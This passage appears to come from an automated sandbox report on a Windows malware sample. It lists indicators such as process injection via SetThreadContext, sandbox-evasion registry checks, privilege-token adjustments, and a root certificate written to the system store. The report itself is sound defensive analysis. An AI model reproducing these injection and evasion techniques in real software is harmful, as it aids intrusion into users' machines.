888 sisbkup.exe 1516 sisbkup.exe 1588 sisbkup.exe 984 sisbkup.exe 1384 sisbkup.exe 276 sisbkup.exe 1884 sisbkup.exe 1724 sisbkup.exe 1304 sisbkup.exe 1984 sisbkup.exe 1572 sisbkup.exe 472 sisbkup.exe 1460 sisbkup.exe 788 sisbkup.exe 1544 sisbkup.exe 1548 sisbkup.exe 1912 sisbkup.exe -
Suspicious use of SetThreadContext 34 IoCs
Processes:
1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exeCF8F.exeE812.exeiuehjsaiuehjsaiuehjsa5CFC.exeiuehjsaiuehjsaiuehjsaiuehjsaiuehjsaiuehjsaiuehjsaiuehjsaiuehjsaiuehjsaiuehjsaiuehjsaiuehjsaiuehjsaiuehjsaiuehjsaiuehjsaiuehjsaiuehjsaiuehjsaiuehjsaiuehjsaiuehjsaiuehjsaiuehjsaiuehjsaiuehjsadescription pid process target process PID 612 set thread context of 1112 612 1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe 1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe PID 812 set thread context of 1056 812 CF8F.exe CF8F.exe PID 1968 set thread context of 720 1968 E812.exe E812.exe PID 856 set thread context of 1944 856 iuehjsa iuehjsa PID 1200 set thread context of 572 1200 iuehjsa iuehjsa PID 1480 set thread context of 1952 1480 iuehjsa iuehjsa PID 1572 set thread context of 1768 1572 5CFC.exe 5CFC.exe PID 1824 set thread context of 320 1824 iuehjsa iuehjsa PID 788 set thread context of 1600 788 iuehjsa iuehjsa PID 1516 set thread context of 1384 1516 iuehjsa iuehjsa PID 1568 set thread context of 1312 1568 iuehjsa iuehjsa PID 1724 set thread context of 1640 1724 iuehjsa iuehjsa PID 2396 set thread context of 2408 2396 iuehjsa iuehjsa PID 1876 set thread context of 968 1876 iuehjsa iuehjsa PID 2688 set thread context of 2672 2688 iuehjsa iuehjsa PID 1584 set thread context of 2160 1584 iuehjsa iuehjsa PID 1128 set thread context of 2948 1128 iuehjsa iuehjsa PID 2484 set thread context of 2576 2484 iuehjsa iuehjsa PID 3060 set thread context of 1480 3060 iuehjsa iuehjsa PID 2544 set thread context of 2696 2544 iuehjsa iuehjsa PID 2192 set thread context of 2364 2192 iuehjsa iuehjsa PID 2620 set thread context of 3020 2620 iuehjsa iuehjsa PID 2716 set thread context of 2648 2716 iuehjsa iuehjsa PID 964 set thread context of 2288 964 iuehjsa iuehjsa PID 2124 set thread context of 2592 2124 iuehjsa iuehjsa PID 2936 set thread context of 3004 2936 iuehjsa iuehjsa PID 2300 set thread context of 2780 2300 iuehjsa iuehjsa PID 2732 set thread context of 2476 2732 iuehjsa iuehjsa PID 2620 set thread context of 2212 2620 iuehjsa iuehjsa PID 2968 set thread context of 956 2968 iuehjsa iuehjsa PID 2600 set thread context of 2140 2600 iuehjsa iuehjsa PID 2528 set thread context of 2300 2528 iuehjsa iuehjsa PID 2912 set thread context of 2932 2912 iuehjsa iuehjsa PID 2204 set thread context of 3048 2204 iuehjsa iuehjsa -
autoit_exe 21 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule behavioral1/memory/1672-164-0x0000000001040000-0x0000000001656000-memory.dmp autoit_exe behavioral1/memory/1672-165-0x0000000001040000-0x0000000001656000-memory.dmp autoit_exe behavioral1/memory/1672-166-0x0000000001040000-0x0000000001656000-memory.dmp autoit_exe behavioral1/memory/1672-167-0x0000000001040000-0x0000000001656000-memory.dmp autoit_exe behavioral1/memory/1672-168-0x0000000001040000-0x0000000001656000-memory.dmp autoit_exe behavioral1/memory/952-180-0x0000000001040000-0x0000000001656000-memory.dmp autoit_exe behavioral1/memory/952-181-0x0000000001040000-0x0000000001656000-memory.dmp autoit_exe behavioral1/memory/952-182-0x0000000001040000-0x0000000001656000-memory.dmp autoit_exe behavioral1/memory/952-183-0x0000000001040000-0x0000000001656000-memory.dmp autoit_exe behavioral1/memory/952-184-0x0000000001040000-0x0000000001656000-memory.dmp autoit_exe behavioral1/memory/1256-187-0x0000000001040000-0x0000000001656000-memory.dmp autoit_exe behavioral1/memory/1256-188-0x0000000001040000-0x0000000001656000-memory.dmp autoit_exe behavioral1/memory/1256-189-0x0000000001040000-0x0000000001656000-memory.dmp autoit_exe behavioral1/memory/1256-190-0x0000000001040000-0x0000000001656000-memory.dmp autoit_exe behavioral1/memory/1256-191-0x0000000001040000-0x0000000001656000-memory.dmp autoit_exe behavioral1/memory/560-246-0x0000000002080000-0x0000000002CCA000-memory.dmp autoit_exe behavioral1/memory/560-247-0x0000000002080000-0x0000000002CCA000-memory.dmp autoit_exe behavioral1/memory/960-280-0x0000000002080000-0x0000000002CCA000-memory.dmp autoit_exe behavioral1/memory/960-281-0x0000000002080000-0x0000000002CCA000-memory.dmp autoit_exe behavioral1/memory/1488-547-0x00000000024F0000-0x000000000313A000-memory.dmp autoit_exe behavioral1/memory/1488-548-0x00000000024F0000-0x000000000313A000-memory.dmp autoit_exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 324 1308 WerFault.exe 366.exe -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
iuehjsajjehjsajjehjsaiuehjsa1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exejjehjsaiuehjsaiuehjsajjehjsajjehjsajjehjsaiuehjsaCF8F.exeiuehjsajjehjsajjehjsaiuehjsaiuehjsajjehjsaiuehjsaiuehjsajjehjsajjehjsaiuehjsaiuehjsaiuehjsaiuehjsajjehjsajjehjsaiuehjsaiuehjsajjehjsajjehjsaiuehjsajjehjsaDE12.exejjehjsajjehjsajjehjsajjehjsajjehjsajjehjsadescription ioc process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI iuehjsa Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jjehjsa Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jjehjsa Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI iuehjsa Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jjehjsa Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI iuehjsa Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI iuehjsa Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jjehjsa Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jjehjsa Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jjehjsa Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jjehjsa Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jjehjsa Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI iuehjsa Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI CF8F.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI iuehjsa Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jjehjsa Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jjehjsa Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI iuehjsa Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI CF8F.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jjehjsa Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI iuehjsa Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI iuehjsa Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jjehjsa Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI iuehjsa Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI iuehjsa Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI iuehjsa Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jjehjsa Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jjehjsa Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jjehjsa Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI iuehjsa Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI iuehjsa Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI iuehjsa Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI iuehjsa Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jjehjsa Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jjehjsa Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jjehjsa Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jjehjsa Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI iuehjsa Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI iuehjsa Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI iuehjsa Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI iuehjsa Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jjehjsa Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jjehjsa Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jjehjsa Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI iuehjsa Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jjehjsa Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI CF8F.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DE12.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI iuehjsa Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jjehjsa Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jjehjsa Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jjehjsa Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI iuehjsa Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jjehjsa Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jjehjsa Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI iuehjsa Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jjehjsa Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI iuehjsa Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jjehjsa Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jjehjsa Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI iuehjsa Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI iuehjsa Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jjehjsa -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
630.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 630.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 630.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 856 timeout.exe -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 988 taskkill.exe 1900 taskkill.exe -
Processes:
mshta.exemshta.exemshta.exemshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies data under HKEY_USERS 20 IoCs
Processes:
netsh.exezfadmvvq.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ zfadmvvq.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" zfadmvvq.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client" netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" zfadmvvq.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation" netsh.exe -
Processes:
366.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A 366.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 366.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e709000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6502000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 366.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exepid process 1112 1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe 1112 1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
Processes:
WerFault.exeB163.exepid process 1264 324 WerFault.exe 1696 B163.exe -
Suspicious behavior: MapViewOfSection 63 IoCs
Processes:
1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exeCF8F.exeDE12.exeiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsajjehjsaiuehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsapid process 1112 1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe 1056 CF8F.exe 1344 DE12.exe 1944 iuehjsa 1936 jjehjsa 572 iuehjsa 1216 jjehjsa 1952 iuehjsa 1128 jjehjsa 320 iuehjsa 1064 jjehjsa 1600 iuehjsa 1988 jjehjsa 1384 iuehjsa 276 jjehjsa 1312 iuehjsa 188 jjehjsa 1640 iuehjsa 456 jjehjsa 2408 iuehjsa 2384 jjehjsa 968 iuehjsa 2040 jjehjsa 2672 iuehjsa 2704 jjehjsa 2160 iuehjsa 2296 jjehjsa 2948 iuehjsa 2664 jjehjsa 2564 jjehjsa 2576 iuehjsa 1480 iuehjsa 2204 jjehjsa 2696 iuehjsa 2896 jjehjsa 2364 iuehjsa 2580 jjehjsa 3020 iuehjsa 1200 jjehjsa 2648 iuehjsa 1540 jjehjsa 2288 iuehjsa 2680 jjehjsa 2592 iuehjsa 1732 jjehjsa 3004 iuehjsa 2728 jjehjsa 2780 iuehjsa 2412 jjehjsa 2476 iuehjsa 2796 jjehjsa 2212 iuehjsa 2532 jjehjsa 956 iuehjsa 1568 jjehjsa 2140 iuehjsa 3008 jjehjsa 2300 iuehjsa 2180 jjehjsa 2932 iuehjsa 1080 jjehjsa 3048 iuehjsa 1568 jjehjsa -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
FAC9.exe101.exeE812.exetaskkill.exeFABE.exeWerFault.exepowershell.exeD5E5.exetaskkill.exedescription pid process Token: SeDebugPrivilege 1212 FAC9.exe Token: SeDebugPrivilege 1232 101.exe Token: SeDebugPrivilege 720 E812.exe Token: SeDebugPrivilege 988 taskkill.exe Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeDebugPrivilege 1708 FABE.exe Token: SeDebugPrivilege 324 WerFault.exe Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeDebugPrivilege 1488 powershell.exe Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeDebugPrivilege 1900 D5E5.exe Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeDebugPrivilege 1900 taskkill.exe Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 Token: SeShutdownPrivilege 1264 -
Suspicious use of FindShellTrayWindow 22 IoCs
Processes:
pid process 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 -
Suspicious use of SendNotifyMessage 15 IoCs
Processes:
pid process 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 1264 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
